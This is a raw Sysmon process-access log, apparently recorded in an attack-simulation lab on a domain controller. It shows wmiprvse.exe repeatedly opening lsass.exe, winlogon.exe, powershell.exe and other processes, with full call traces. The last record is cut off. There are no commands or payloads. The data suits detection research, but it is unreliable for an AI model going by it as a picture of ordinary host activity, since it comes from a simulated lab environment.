15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027042Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.944{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027041Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536B-6008-7006-00000000A301}7828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027040Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536B-6008-6F06-00000000A301}6840C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027039Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-536B-6008-6E06-00000000A301}7492C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027038Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027037Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027036Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027035Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027034Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027033Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027032Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027031Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027030Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027029Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027028Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027027Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027026Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027025Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027024Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027023Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.897{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program 